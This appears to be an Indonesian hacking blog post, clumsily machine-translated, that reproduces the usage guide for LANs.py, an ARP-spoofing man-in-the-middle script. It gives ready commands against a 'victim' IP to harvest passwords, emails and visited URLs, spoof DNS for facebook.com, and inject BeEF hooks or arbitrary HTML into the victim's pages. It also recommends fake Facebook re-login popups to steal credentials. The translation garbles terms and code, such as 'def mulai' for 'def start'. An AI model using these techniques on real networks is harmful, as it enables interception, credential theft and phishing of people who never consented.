LANs.py: ( Download at Github )
- Individual meracuni tabel ARP dari kotak target, router dan server DNS jika diperlukan.
- Tidak meracuni orang lain pada jaringan.
- Menampilkan semua bit paling menarik lalu lintas dan dapat menyuntikkan html kustom ke halaman yang mereka kunjungi.
- Membersihkan setelah itu sendiri.
Prereqs:
- Linux
- scapy
- python nfqueue-binding 0.4.3 +
- aircrack-ng
- python twisted
- BeEF (optional)
- Kartu nirkabel yang mampu modus promiscuous jika Anda memilih untuk tidak menggunakan opsi-ip
Diuji di Kali 1.0.
Dalam contoh berikut 192.168.0.5 akan menjadi mesin penyerang dan 192.168.0.10 akan menjadi korban.
Semua pilihan:
python LANs.py [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS] [-vmac VICTIMMAC] [-d] [-v] [-dns DNSSPOOF] [-r IPADDRESS] [-set] [-p] [-na] [-n] [-i INTERFACE] [-rip ROUTERIP] [-rmac ROUTERMAC] [-pcap PCAP]
Penggunaan:
Penggunaan sederhana (termasuk pengguna aktif penargetan):
python LANs.py
Karena tidak ada-ip opsi ini akan ARP memindai jaringan, membandingkannya dengan berjalan capture promiscuous hidup, dan daftar semua klien pada jaringan termasuk Windows mereka NetBIOS nama bersama dengan berapa banyak paket data mereka mengirim. sehingga Anda dapat langsung menargetkan yang aktif. Kemampuan untuk menangkap paket data yang mereka kirim sangat tergantung pada kedekatan fisik dan kekuatan kartu jaringan Anda. maka Anda bisa Ctrl-C dan memilih target yang kemudian akan ARP spoof. Identifikasi sasaran Sederhana dan ARP spoofing.
Pasif panen:
python LANs.py -u -d -p -ip 192.168.0.10
- -U: mencetak URL yang dikunjungi, memotong pada 150 karakter dan menyaring gambar / css / js / WOFF / svg url karena mereka spam output dan menarik
- -D: membuka xterm dengan driftnet untuk melihat semua gambar yang mereka lihat
- -P: nama cetak / password untuk FTP / IMAP / POP / IRC / HTTP, HTTP POST dibuat, semua pencarian yang dilakukan, email masuk / keluar, dan pesan IRC dikirim / diterima, juga akan decode base64 jika otentikasi email dienkripsi dengan itu
- -Ip: menargetkan alamat IP ini
Mudah diingat dan mungkin akan menjadi penggunaan yang paling umum dari script: pilihan u, d, p, seperti udp / tcp.
HTML Injection:
python LANs.py -b http://192.168.0.5:3000/hook.js
Jika Anda sudah familiar dengan BeEF, Anda tahu bahwa ini akan menyuntikkan URL BeEF hook ke halaman kunjungan korban.
python LANs.py -c ‘<title>Owned.</title>’
Menyuntikkan sewenang-wenang HTML ke dalam halaman kunjungan korban. Pertama mencoba untuk menyuntikkan setelah <head> pertama dan gagal yang menyuntikkan sebelum pertama </ head>. Contoh ini akan mengubah judul halaman untuk ‘Owned.’
Baca dari file pcap:
python LANs.py -pcap [libpcapfilename] -ip 192.168.0.10
Untuk membaca dari file pcap Anda harus menyertakan alamat IP target dengan-ip opsi. Hal ini juga harus dalam bentuk libpcap yang paling umum pula. Salah satu keuntungan dari membaca dari file pcap adalah bahwa Anda tidak perlu menjadi root untuk menjalankan script.
Paling Agresif Penggunaan:
python LANs.py -v -d -p -n -na -set -dns facebook.com -r 74.125.225.64 -c ‘<title>Owned.</title>’ -b http://192.168.0.5:3000/hook.js -ip 192.168.0.10
Semua Options (help):
python LANs.py-h
- -B BEEF_HOOK_URL: salin URL BeEF hook untuk menyuntikkan ke setiap halaman kunjungan korban, misalnya:-b http://192.168.1.10:3000/hook.js
- -C 'HTML CODE': menyuntikkan sewenang-wenang kode HTML ke dalam halaman kunjungan korban; menyertakan tanda kutip ketika memilih HTML untuk menyuntikkan
- -D membuka xterm dengan driftnet untuk melihat semua gambar yang mereka lihat
- -Dns DOMAIN: spoof DNS dari DOMAIN. misalnya-dns facebook.com akan DNS spoof setiap permintaan DNS ke facebook.com atau subdomain.facebook.com
- -R IPADDRESS: hanya untuk digunakan dengan opsi DOMAIN the-dns, mengarahkan pengguna ke IPADDRESS ini ketika mereka mengunjungi DOMAIN
- -U cetakan URL yang dikunjungi, memotong pada 150 karakter dan menyaring gambar / css / js / WOFF / svg url karena mereka spam output dan menarik
- I- INTERFACE: menentukan antarmuka; default adalah antarmuka pertama dalam ip route, misalnya:-i wlan0
- -Ip menargetkan alamat IP ini
- -N melakukan scan nmap cepat dari target
- -Na melakukan sebuah nmap pemindaian agresif di latar belakang dan output untuk [Alamat IP Korban]. nmap.txt
- -P print username / password untuk FTP / IMAP / POP / IRC / HTTP, HTTP POST dibuat, semua pencarian yang dilakukan, email masuk / keluar, dan pesan IRC dikirim / diterima
- -Pcap [PCAP_FILE] mengurai melalui semua paket dalam file pcap, membutuhkan-ip [alamat IP target] argumen
- -Rmac [ROUTER_MAC] masuk ke router MAC di sini jika Anda mengalami kesulitan mendapatkan script untuk secara otomatis mengambilnya
- -Rip [ROUTER_IP] masukkan IP router di sini jika Anda mengalami kesulitan mendapatkan script untuk secara otomatis mengambilnya
- -V menunjukkan URL verbose yang tidak memotong pada 150 karakter seperti-u
Clean Up
Setelah menerima Ctrl-C:
- Mematikan IP forwarding
- Flushes iptables firewall
- Individual mengembalikan router dan korban ARP tabel
Rincian Teknis
Script ini menggunakan python nfqueue-binding antrian dibungkus dalam twisted IReadDescriptor untuk memberi makan paket ke fungsi callback. nfqueue-binding digunakan untuk drop dan meneruskan paket tertentu. Scapy perpustakaan Python melakukan pekerjaan untuk mengurai dan menyuntikkan paket.
Menyuntikkan kode terdeteksi adalah permainan tidak pasti, jika hal kecil yang salah atau server korban meminta data dari melakukan hal-hal dengan cara yang unik atau langka maka pengguna tidak akan dapat membuka halaman mereka berusaha untuk melihat dan mereka akan tahu sesuatu terserah. Script ini dirancang untuk meneruskan paket jika sesuatu gagal sehingga selama penggunaan Anda mungkin melihat banyak "[!] Injected paket untuk www.domain.com" tetapi hanya melihat satu atau dua domain pada panel BeEF yang browser kecanduan. Ini adalah OK. Jika mereka tidak mendapatkan kecanduan pada halaman pertama hanya menunggu mereka untuk menelusuri beberapa halaman lainnya.Tujuannya adalah untuk menjadi kentara. Alat BeEF favorit saya adalah di Commands> Social Engineering. Apakah hal-hal seperti membuat seorang pejabat mencari Facebook muncul mengatakan otentikasi pengguna berakhir dan memasukkan kembali identitasnya.
CATATAN UNTUK PENGGUNA UBUNTU: Anda perlu memperbarui / memasang manual nfqueue-binding ke versi 0.4.3 karena fakta versi di repo Ubuntu adalah 0,2. Atau hanya mengedit Parser.start () function on line 135 dari:
def mulai (self, payload):
to:
def mulai (self, i, payload)
Sekian dulu dari saya,, :D
Terus kunjungi Blog ini, untuk selanjutnya saya akan share beberapa trick dan tutorial tentang Hacking. wasslam....
Terus kunjungi Blog ini, untuk selanjutnya saya akan share beberapa trick dan tutorial tentang Hacking. wasslam....
Content Creator : Antar Prasetya Yoga
0 comments:
Post a Comment